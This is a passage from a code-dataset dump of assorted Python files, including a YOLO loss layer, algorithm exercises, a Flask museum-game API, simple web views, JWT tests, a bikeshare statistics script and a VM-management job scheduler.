self.grid_y\n pred_boxes[..., 2] = torch.exp(w.data) * self.anchor_w\n pred_boxes[..., 3] = torch.exp(h.data) * self.anchor_h\n print(pred_boxes.shape)\n\n output = torch.cat((\n pred_boxes.view(num_samples, -1, 4) * self.stride,\n pred_conf.view(num_samples, -1, 1),\n pred_cls.view(num_samples, -1, self.num_classes)), -1)\n\n if targets is None:\n return output, 0\n else:\n iou_scores, class_mask, obj_mask, noobj_mask, tx, ty, tw, th, tcls, tconf = build_targets(\n pred_boxes=pred_boxes,\n pred_cls=pred_cls,\n target=targets,\n anchors=self.scaled_anchors,\n ignore_thres=self.ignore_thres,\n )\n\n # Loss : Mask outputs to ignore non-existing objects (except with conf. loss)\n loss_x = self.mse_loss(x[obj_mask], tx[obj_mask])\n loss_y = self.mse_loss(y[obj_mask], ty[obj_mask])\n loss_w = self.mse_loss(w[obj_mask], tw[obj_mask])\n loss_h = self.mse_loss(h[obj_mask], th[obj_mask])\n loss_conf_obj = self.bce_loss(pred_conf[obj_mask], tconf[obj_mask])\n loss_conf_noobj = self.bce_loss(pred_conf[noobj_mask], tconf[noobj_mask])\n loss_conf = self.obj_scale * loss_conf_obj + self.noobj_scale * loss_conf_noobj\n loss_cls = self.bce_loss(pred_cls[obj_mask], tcls[obj_mask])\n total_loss = loss_x + loss_y + loss_w + loss_h + loss_conf + loss_cls\n\n # Metrics\n cls_acc = 100 * class_mask[obj_mask].mean()\n conf_obj = pred_conf[obj_mask].mean()\n conf_noobj = pred_conf[noobj_mask].mean()\n conf50 = (pred_conf > 0.5).float()\n iou50 = (iou_scores > 0.5).float()\n iou75 = (iou_scores > 0.75).float()\n detected_mask = conf50 * class_mask * tconf\n precision = torch.sum(iou50 * detected_mask) / (conf50.sum() + 1e-16)\n recall50 = torch.sum(iou50 * detected_mask) / (obj_mask.sum() + 1e-16)\n recall75 = torch.sum(iou75 * detected_mask) / (obj_mask.sum() + 1e-16)\n\n self.metrics = {\n \"loss\": to_cpu(total_loss).item(),\n \"x\": to_cpu(loss_x).item(),\n \"y\": to_cpu(loss_y).item(),\n \"w\": to_cpu(loss_w).item(),\n \"h\": to_cpu(loss_h).item(),\n \"conf\": to_cpu(loss_conf).item(),\n \"cls\": to_cpu(loss_cls).item(),\n \"cls_acc\": to_cpu(cls_acc).item(),\n \"recall50\": to_cpu(recall50).item(),\n \"recall75\": to_cpu(recall75).item(),\n \"precision\": to_cpu(precision).item(),\n \"conf_obj\": to_cpu(conf_obj).item(),\n \"conf_noobj\": to_cpu(conf_noobj).item(),\n \"grid_size\": grid_size,\n }\n\n return output, 
total_loss\n","sub_path":"tw/nn/layer/yolo_layer.py","file_name":"yolo_layer.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"374783338","text":"# Uses python3\nimport sys\n\ndef get_fibonacci_last_digit(n):\n n = n % 60 # last digits of Fibonacci numbers repeat with Pisano period 60\n if (n <= 1):\n return n\n else:\n a,b = 0,1\n for num in range(n-1):\n rem = a + b\n rem = rem % 10\n b, a = rem, b\n return rem\n\ndef fib_sum_last_digit(n):\n a, b = 0, 1\n for i in range((n + 2) % 60):\n a, b = b, (a + b) % 10\n if a == 0:\n return 9\n else:\n return a - 1\n\ndef fibonacci_partial_sum(from_, to):\n if (from_ == to):\n num = get_fibonacci_last_digit(from_)\n return num\n x = fib_sum_last_digit(from_ - 1)\n y = fib_sum_last_digit(to)\n if (y >= x):\n return (y-x)\n else:\n return ((y+10) - x)\n \n\n\nif __name__ == '__main__':\n input = sys.stdin.read();\n from_, to = map(int, input.split())\n print(fibonacci_partial_sum(from_, to))","sub_path":"Algorithmic toolbox - Coursera/week2_algorithmic_warmup/fibonacci_partial_sum.py","file_name":"fibonacci_partial_sum.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136487059","text":"from zipfile import ZipFile\n\nurl = \"http://www.pythonchallenge.com/pc/def/{}.html\"\n\nnothing = \"90052\"\n\nwith ZipFile('./channel.zip', 'r') as z:\n while True:\n try:\n with z.open(\"{}.txt\".format(nothing)) as f:\n nothing = f.read()[16:].decode('utf-8')\n print(z.getinfo(f.name).comment.decode('utf-8'), end=\"\")\n except KeyError:\n break\n\n\n#This reveals the key is oxygen\nfinal = \"oxygen\"\n\nprint(url.format(final))","sub_path":"Problem_6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"217757033","text":"from flask import Flask, jsonify, request\nfrom Classes import Detective, Museum, Team\nimport os\nfrom Database import db_setup, user_data_update, get_next_id, db_next_object, db_next_hint, db_check, get_gallery_data\nimport Database\n\nusers = dict() # Initialize users dictionary. 
Only new users are to be added to this dictionary!\nusers['member_list'] = [['User Name', 0]] # Initialize list of members with their user ids.\n\nphila = Museum() # Initialize the philadelphia art museum\napp = Flask(__name__) # Initialize the app.\n\nrunning_file_name = os.path.basename(__file__) # Find name of current running file.\ndb_setup(app, running_file_name) # Setup database (if necessary)\n\n\n# Adding a new user\n@app.route(\"/signup\", methods=['POST'])\ndef new_user():\n global users\n\n new_id = get_next_id() # Calculate new user_id\n users[str(new_id)] = Detective(user_name='Blank') # Generate new user in users dict\n data = {'_id': users[str(new_id)]._user_id}\n return jsonify(data) # Confirm that account was set up!\n\n\n# Easy login process\n@app.route('/easylogin', methods=['POST'])\ndef easy_login():\n global users # Indicate that we wanna change users globally\n\n try:\n user_id = request.json[\"UserID\"] # Get user id\n users[user_id] = Detective(user_id=user_id) # Change users\n except TypeError:\n raise Exception('UserID does not exist in database.')\n except KeyError:\n raise Exception('Missing or bad UserID')\n # Return confirmation of login.\n return jsonify({'Logged In': True})\n\n\n# Get user data\n@app.route(\"/user/<name>\", methods=['GET'])\ndef user_data(name):\n try:\n data = users[int(name)].get() # Get user data\n except KeyError:\n raise Exception('User not logged in.')\n return jsonify(data) # Return user data\n\n\n# Typing suggestions based on gallery. Provides a list of titles.\n@app.route(\"/gallery/<gallery_number>\", methods=['GET'])\ndef type_sug(gallery_number):\n data = jsonify(get_gallery_data(gallery_number)) # Get the data (list of titles for now)\n return data\n\n\n''' SAVE FOR LATER!!!!\n# Get team stats\n@app.route(\"/team/<name>\", methods=['GET'])\ndef team_stats(name):\n print(name)\n data = eval(name).team_stats()\n return data\n'''\n\n\n# Gets user level/path data.\n@app.route('/level', methods=['POST'])\ndef start_level():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n step = request.json['Step'] # Get the step\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n\n return jsonify(db_next_object(level, step))\n\n\n# Checks a submitted answer against the database.\n@app.route('/submit', methods=['POST'])\ndef check_answer():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n step = request.json['Step'] # Get the step\n guess = request.json['Guess'] # Get the guess\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n\n mybool = db_check(level, step, guess)\n answer = jsonify(mybool)\n if mybool is True:\n global users\n try:\n users[int(user_id)].points += 5 # Add points\n users[int(user_id)].db_update() # Update Database.\n except KeyError:\n raise Exception('User not logged in.')\n\n return answer\n\n\n@app.route('/hint', methods=['POST'])\ndef get_hint():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n step = request.json['Step'] # Get the step\n except KeyError as error: # Generate exception if Client is 
missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n hint = db_next_hint(level, step)\n data = jsonify({'Hint': hint})\n return data\n\n\n# Update user location\n@app.route('/location', methods=['POST'])\ndef get_gallery_location():\n try:\n user_id = request.json['UserID'] # Get the user id.\n gallery = request.json['Gallery'] # Get the gallery number\n except:\n raise Exception(\"No ID or gallery.\") # Raise exception\n global users # Call the user directory\n users[user_id].get_gallery_location(gallery) # Update the user location\n return jsonify({'Updated': True}) # a view must return a response; payload shape assumed\n\n\n@app.route('/getobjects', methods=['POST'])\ndef get_cases():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n data = Database.db_get_all_objects(level) # Collect data\n\n return jsonify(data) # Ship it out!\n\n\n@app.route(\"/\")\ndef hello():\n return \"Welcome to Art Tracker!\"\n\n\nprint(__name__)\n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)\n","sub_path":"Back End/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"560222759","text":"import urllib.parse\nfrom datetime import datetime\nfrom pprint import pformat\n\nfrom henango.http.cookie import Cookie\nfrom henango.http.request import HTTPRequest\nfrom henango.http.response import HTTPResponse\nfrom henango.template.renderer import render\n\n\ndef now(request: HTTPRequest) -> HTTPResponse:\n \"\"\"\n Generate the HTML that displays the current time\n \"\"\"\n context = {\"now\": datetime.now()}\n body = render(\"now.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef show_request(request: HTTPRequest) -> HTTPResponse:\n \"\"\"\n Generate the HTML that displays the contents of the HTTP request\n \"\"\"\n context = {\"request\": request, \"headers\": pformat(request.headers), \"body\": request.body.decode(\"utf-8\", \"ignore\")}\n body = render(\"show_request.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef parameters(request: HTTPRequest) -> HTTPResponse:\n \"\"\"\n Generate the HTML that displays the POST parameters\n \"\"\"\n\n # For a GET request, return 405\n if request.method == \"GET\":\n body = b\"
<html><body><h1>405 Method Not Allowed</h1></body></html>
\"\n\n return HTTPResponse(body=body, status_code=405)\n\n elif request.method == \"POST\":\n context = {\"params\": urllib.parse.parse_qs(request.body.decode())}\n body = render(\"parameters.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef user_profile(request: HTTPRequest) -> HTTPResponse:\n context = {\"user_id\": request.params[\"user_id\"]}\n\n body = render(\"user_profile.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef set_cookie(request: HTTPRequest) -> HTTPResponse:\n return HTTPResponse(cookies=[Cookie(name=\"username\", value=\"TARO\")])\n\n\ndef login(request: HTTPRequest) -> HTTPResponse:\n if request.method == \"GET\":\n body = render(\"login.html\", {})\n return HTTPResponse(body=body)\n\n elif request.method == \"POST\":\n post_params = urllib.parse.parse_qs(request.body.decode())\n username = post_params[\"username\"][0]\n email = post_params[\"email\"][0]\n\n cookies = [\n Cookie(name=\"username\", value=username, max_age=30),\n Cookie(name=\"email\", value=email, max_age=30),\n ]\n\n return HTTPResponse(status_code=302, headers={\"Location\": \"/welcome\"}, cookies=cookies)\n\n\ndef welcome(request: HTTPRequest) -> HTTPResponse:\n # Cookieにusernameが含まれていなければ、ログインしていないとみなして/loginへリダイレクト\n if \"username\" not in request.cookies:\n return HTTPResponse(status_code=302, headers={\"Location\": \"/login\"})\n\n # Welcome画面を表示\n username = request.cookies[\"username\"]\n email = request.cookies[\"email\"]\n body = render(\"welcome.html\", context={\"username\": username, \"email\": email})\n\n return HTTPResponse(body=body)\n","sub_path":"codes/chapter20-4/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609112965","text":"import os\n#declarar las variables\ncliente,empresa_azucarera,quintales_azucar,precio_quintal=\"\",\"\",0.0,0.0\n\n\n#input\ncliente=os.sys.argv[1]\nempresa_azucarera=os.sys.argv[2]\nquintales_azucar=int(os.sys.argv[3])\nprecio_quintal=float(os.sys.argv[4])\n\n#validador de datos\ncliente_incorrect=(cliente!=\"luis\")\nazucarera_incorrecta=(empresa_azucarera!=\"pomalca\" and empresa_azucarera!=\"tuman\" and empresa_azucarera!=\"pucala\")\nquintales_incorrect=(quintales_azucar<0)\nprecio_quintal_incorrect=(precio_quintal<0)\n\n#mientras lo sdatos ingresados sean incorrectos\nwhile(cliente_incorrect):\n cliente=input(\"ingresar cliente correcto:\")\n cliente_incorrect=(cliente!=\"luis\")\n\nwhile(azucarera_incorrecta):\n empresa_azucarera=input(\"ingrese nombre azucarera correcta:\")\n azucarera_incorrecta=(empresa_azucarera!=\"pomalca\" and empresa_azucarera!=\"tuman\" and empresa_azucarera!=\"pucala\")\n\nwhile(quintales_incorrect):\n quintales_azucar=int(input(\"ingresar los quintales de azucar correctos:\"))\n quintales_incorrect=(quintales_azucar<0)\n\nwhile(precio_quintal_incorrect):\n precio_quintal=float(input(\"ingresar elprecio correcto de cada quintal:\"))\n precio_quintal_incorrect=(precio_quintal<0)\n\n#fin_while\nprint(\"fin del bucle\")\n\n#processing\ntotal=quintales_azucar*precio_quintal\nigv=total*0.18\ntotal_pagar=total+igv\n\n\n#output\nprint(\"#############################################################\")\nprint(\"# AZUCAR POMALCA\t\t #\")\nprint(\"#############################################################\")\nprint(\"cliente:\", cliente ,\"empresa azucarera:\", empresa_azucarera)\nprint(\"#############################################################\")\nprint(\"#\")\nprint(\"#item:\", 
quintales_azucar, \"quintales de azucar\")\nprint(\"#P.U.:\", precio_quintal)\nprint(\"#total:\", total)\nprint(\"#IGV:\", igv)\nprint(\"total a pagar:\", total_pagar)\nprint(\"#############################################################\")","sub_path":"damian/bucle_mientras/ejer5.py","file_name":"ejer5.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"412912953","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nfrom jose.tests import (\n JWT_A1, JWT_A2,\n JWS_A2,\n JWE_A2,\n)\n\nfrom jose.jwk import Jwk, JwkSet\nfrom jose.jwt import Jwt\nfrom jose.crypto import KeyOwner\nfrom jose.jwa.keys import KeyTypeEnum\n\n\nclass TestEntity(KeyOwner):\n def __init__(self, identifier, jku, jwkset=None):\n self.identifier = identifier \n self.jku = jku \n self.jwkset = jwkset or JwkSet(\n keys=[\n Jwk.generate(KeyTypeEnum.RSA),\n Jwk.generate(KeyTypeEnum.EC),\n Jwk.generate(KeyTypeEnum.OCT),\n ] \n ) \n\n def get_key(self, crypto, *args, **kwargs):\n return self.jwkset.get_key(\n crypto.key_type, kid=crypto.kid\n ) \n\nclass TestJwt(unittest.TestCase):\n\n def test_appendix_a1(self):\n '''\n nose2 jose.tests.test_jwt.TestJwt.test_appendix_a1\n '''\n sender = TestEntity(\n \"http://sender\", \"http://sender/jwkset\",\n )\n receiver = TestEntity(\n \"http://receiver\", \"http://receiver/jwkset\",\n JwkSet(keys=[Jwk(**JWE_A2.jwk_dict)])\n )\n\n token = Jwt.parse(JWT_A1.token, sender, receiver)\n\n self.assertEqual(token.iss, \"joe\")\n self.assertEqual(token.exp, 1300819380)\n self.assertTrue(token['http://example.com/is_root'])\n\n def test_appendix_a2(self):\n '''\n nose2 jose.tests.test_jwt.TestJwt.test_appendix_a2\n\n '''\n sender = TestEntity(\n \"http://sender\", \"http://sender/jwkset\",\n JwkSet(keys=[Jwk(**JWE_A2.jwk_dict)])\n )\n receiver = TestEntity(\n \"http://receiver\", \"http://receiver/jwkset\",\n JwkSet(keys=[Jwk(**JWE_A2.jwk_dict)])\n )\n\n token = Jwt.parse(JWT_A2.nested_token, sender, receiver)\n\n self.assertEqual(token.iss, \"joe\")\n self.assertEqual(token.exp, 1300819380)\n self.assertTrue(token['http://example.com/is_root'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/jose/tests/test_jwt.py","file_name":"test_jwt.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"113483971","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='MstAffiliation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('affiliation', models.CharField(max_length=100, db_index=True)),\n ('created_at', models.DateTimeField()),\n ('updated_at', models.DateTimeField()),\n ],\n options={\n 'db_table': 'mst_affiliation',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='MstAuthor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('author', models.CharField(max_length=100, db_index=True)),\n ('mst_affiliation_id', models.IntegerField(db_index=True)),\n ('created_at', models.DateTimeField()),\n ('updated_at', models.DateTimeField()),\n ],\n options={\n 'db_table': 'mst_author',\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n 
name='mstauthor',\n unique_together=set([('author', 'mst_affiliation_id')]),\n ),\n ]\n","sub_path":"apps/statweb/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198687466","text":"def main():\n f = open(\"words.txt\",\"r\")\n content = f.readlines()\n words_dict = {}\n for line in content:\n words = line.replace('\\n','').split(' ')\n # print(words)\n for word in words:\n if word not in words_dict:\n words_dict[word] = 1\n else:\n words_dict[word] += 1\n\n for word, times in sorted(words_dict.items(), key=lambda x: x[1], reverse=True):\n print(word + ' ' + str(times))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CheckWords.py","file_name":"CheckWords.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"253237082","text":"import time\nimport pandas as pd\nimport numpy as np\n\npd.set_option('display.max_columns', None)\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\nmonth_list = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\nday_list = ['sunday', 'monday', 'tuesday','wednesday','thursday','friday','saturday','all']\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n print('Would you like to see Data for Chicago, New York City, or Washington?')\n city = input().lower()\n while city not in CITY_DATA.keys():\n print('Incorrect input: Would you like to see Data for Chicago, New York City, or Washington? Please type one of the three cities')\n city = input().lower()\n\n # get user input for month (all, january, february, ... , june)\n print('What month (January - June) would you like to filter the data by? Type \"all\" for no month filter.')\n month = input().lower()\n while month not in month_list:\n print('Incorrect input: What month (January - June) would you like to filter the data by? Type \"all\" for no month filter.')\n month = input().lower()\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n print('What day would you like to filter the data by? Type \"all\" for no day filter.')\n day = input().lower()\n while day not in day_list:\n print('Incorrect input: What day would you like to filter the data by? 
Type \"all\" for no month filter.')\n day = input().lower()\n\n print('Showing data for',city)\n print('Showing data for the month of', month, 'and the day =', day)\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n #load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n # extract hour from the Start Time column to create an hour column\n df['hour'] = df['Start Time'].dt.hour\n\n # create column of combination of start and end stations\n df['combination'] = df['Start Station'] + '-' + df['End Station']\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n # if only month of data then say month being displayed\n if len(np.unique(df['month'])) == 1:\n # print('This data is for the month of', month_list[df['month'][2]-1].capitalize())\n print('This data is for the month of', month_list[df['month'].mode()[0]-1].capitalize())\n else:\n # if all months selected then find most popular month\n print('Most common month for rides is', month_list[df['month'].mode()[0]-1].capitalize())\n\n # display the most common day of week\n # if only one day of data then say day being displayed\n if len(np.unique(df['day_of_week'])) == 1:\n print('This data is based off of', df['day_of_week'].mode()[0])\n else:\n # if all days selected then find most popular day\n print('Most common day of the week for rides is', df['day_of_week'].mode()[0])\n\n # display the most common start hour\n print('Most common start hour is', df['hour'].mode()[0])\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print('Most commonly used start station is:', df['Start Station'].mode()[0])\n\n # display most commonly used end station\n print('Most commonly used end station is:', df['End Station'].mode()[0])\n\n # display most frequent combination of start station and end station trip\n mostStart,mostEnd = df['combination'].mode()[0].split('-',1)\n print('\\n Most frequent combination of start station and end 
station:')\n print('\\t Start Station:', mostStart)\n print('\\t End Station:', mostEnd)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print(\"Total Travel Time:\", round(df['Trip Duration'].sum()/86400,2), 'days')\n\n # display mean travel time\n print(\"Average Travel Time:\", round(np.average(df['Trip Duration'])/60,2), 'minutes')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print('Counts of user types:')\n print(user_types)\n\n # Display counts of gender\n try:\n gender_count = df['Gender'].value_counts()\n print('\\nCounts of gender:')\n print(gender_count)\n except:\n print('No gender information to share')\n\n # Display earliest, most recent, and most common year of birth\n try:\n earliest_year = int(df['Birth Year'].min())\n recent_year = int(df['Birth Year'].max())\n most_year = int(df['Birth Year'].mode()[0])\n print('\\nRider with earliest birth year:', earliest_year)\n print('Rider with most recent birth year:', recent_year)\n print('Rider with most common birth year:', most_year)\n except:\n print('No birth year information to share for this city')\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n#option for the user to view the raw data a few rows (3) at a time\ndef rawdata(city):\n df = pd.read_csv(CITY_DATA[city])\n n = 3\n view = input('\\nWould you like to see the raw data? Enter yes or no.\\n')\n if view.lower() == 'yes':\n check = True\n print(df.iloc[0:n])\n n +=3\n else:\n check = False\n\n while check:\n view = input('\\nWould you like to continue seeing the raw data? Enter yes or no.\\n')\n if view.lower() == 'yes':\n check = True\n print(df.iloc[n-3:n])\n n +=3\n else:\n check = False\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n # df = load_data('washington', 'may', 'all')\n # print(df.head())\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n rawdata(city)\n\n restart = input('\\nWould you like to restart? 
Enter yes or no.\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"504533920","text":"import subprocess\nimport time\nimport datetime\nfrom django.conf import settings\nfrom backstage.base import job_logger as logger\nfrom backstage.models import Host\nfrom backstage.models import Virtual\nfrom backstage.models import Images\nfrom backstage.models import RecycleBin\nfrom backstage.view.recycle_views import send_alert_message\nfrom .idc import update_idc\nfrom .host import update_host_from_cmdb\nfrom .images import down_process\nfrom .images import start_down\nfrom .images import md5_check\nfrom .report import report_cmdb\nfrom utils.host_requests import HostHandler\n\n\ndef do_action(action, params):\n \"\"\"\n * desc run an action asynchronously\n \"\"\"\n cmd = ''\n if action == 'image_down':\n cmd = '%s %s/job/images.py start_down %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'create_vm':\n cmd = '%s %s/job/virtual.py create_vm %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'rename_vm':\n cmd = '%s %s/job/virtual.py rename_vm %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'reinstall_vm':\n cmd = '%s %s/job/virtual.py reinstall_vm %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'update_host_domain_status':\n cmd = '%s %s/job/host.py update_domain_status %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['ip'])\n elif action == 'update_resource':\n cmd = '%s %s/job/host.py update_resource %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['ip'])\n elif action == 'cmdb_report':\n cmd = '%s %s/job/report.py cmdb_report %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n if cmd:\n subprocess.Popen(cmd, shell=True)\n\n\ndef report_cmdb_vm():\n \"\"\"\n * desc report virtual machines to the CMDB\n * input None\n * output None\n \"\"\"\n logger.info('job report_cmdb_vm start')\n virtual_list = Virtual.objects.filter(\n boot_check_status__in=[0, 2, 3, 4, 5], status__in=[0, 1, 2])\n for line in virtual_list:\n do_action('cmdb_report', {'id': line.id})\n logger.info('job report_cmdb_vm end')\n\n\ndef create_new_vm():\n \"\"\"\n * desc task that creates new virtual machines\n * input None\n * output None\n \"\"\"\n logger.info('job create_new_vm start')\n virtual_list = Virtual.objects.filter(status__in=[14, 15])\n for line in virtual_list:\n do_action('create_vm', {'id': line.id})\n logger.info('job create_new_vm end')\n\n\ndef check_domain_info():\n \"\"\"\n * desc check whether each VM's resource info matches the database\n * input None\n * output None\n \"\"\"\n logger.info('job update_domain_info start')\n virtual_ip_list = []\n virtual_list = Virtual.objects.all()\n for line in virtual_list:\n try:\n flag = 1\n host_handler = HostHandler(line.host_ip)\n domain_info = host_handler.get_domain_resource(line.name)\n if int(domain_info['cpu']) != int(line.cpu):\n flag = 0\n if int(domain_info['maxMem']) != int(line.memory):\n flag = 0\n if int(domain_info['disks']['dev_num']) != int(line.disk_num):\n flag = 0\n if int(domain_info['disks']['total']) != int(line.disk):\n flag = 0\n if not flag:\n virtual_ip_list.append(line.name)\n except Exception as e:\n logger.error(str(e))\n if virtual_ip_list:\n message = 'ip ' + ','.join(virtual_ip_list) + '资源与数据库对应不上'\n send_report_message(message)\n logger.info('job update_domain_info 
end')\n\n\ndef check_host_domain():\n \"\"\"\n * desc verify that the VMs on each host match the database\n * input None\n * output None\n \"\"\"\n logger.info('job check_host_domain start')\n host_ip_list = Virtual.objects.distinct().values('host_ip')\n for host_info in host_ip_list:\n host_ip = host_info['host_ip']\n host_handler = HostHandler(host_ip)\n try:\n host_domain_list = host_handler.host_domain_list()\n domain_list = host_domain_list.keys()\n virtual_db = Virtual.objects.filter(status__in=[0, 1, 2, 3, 4, 5])\n virtual_name_list = [line.name for line in virtual_db]\n if set(domain_list) != set(virtual_name_list):\n domain_message = ','.join(domain_list)\n virtual_message = ','.join(virtual_name_list)\n send_report_message(\n '宿主机%s虚拟机对应不起来 数据库记录的虚拟机为 %s 接口返回的虚拟机是 %s' % (\n host_ip, domain_message, virtual_message))\n except Exception as e:\n logger.error('check_host_domain job error info is %s' % str(e))\n pass\n logger.info('job check_host_domain end')\n\n\ndef update_host_resource():\n \"\"\"\n * desc update host machine resource information\n * input None\n * output None\n \"\"\"\n logger.info('job update_host_resource start')\n host_list = Host.objects.filter(\n ready_status=2).distinct().values(\"minion_id\")\n for minion_info in host_list:\n if not minion_info['minion_id']:\n continue\n time.sleep(0.3)\n do_action('update_resource', {'ip': minion_info['minion_id']})\n logger.info('job update_host_resource end')\n\n\ndef update_host_domain_status():\n \"\"\"\n * desc update the info of all VMs on each host\n * input None\n * output None\n \"\"\"\n logger.info('job update_host_domain_status start')\n host_ip_list = Virtual.objects.distinct().values(\"host_ip\")\n for host_info in host_ip_list:\n if not host_info['host_ip']:\n continue\n time.sleep(0.3)\n do_action('update_host_domain_status', {'ip': host_info['host_ip']})\n logger.info('job update_host_domain_status end')\n\n\ndef check_delete_virtual():\n \"\"\"\n * desc check for VMs scheduled for deletion\n * input None\n * output None\n \"\"\"\n logger.info('job check_delete_virtual start')\n delete_vm_list = 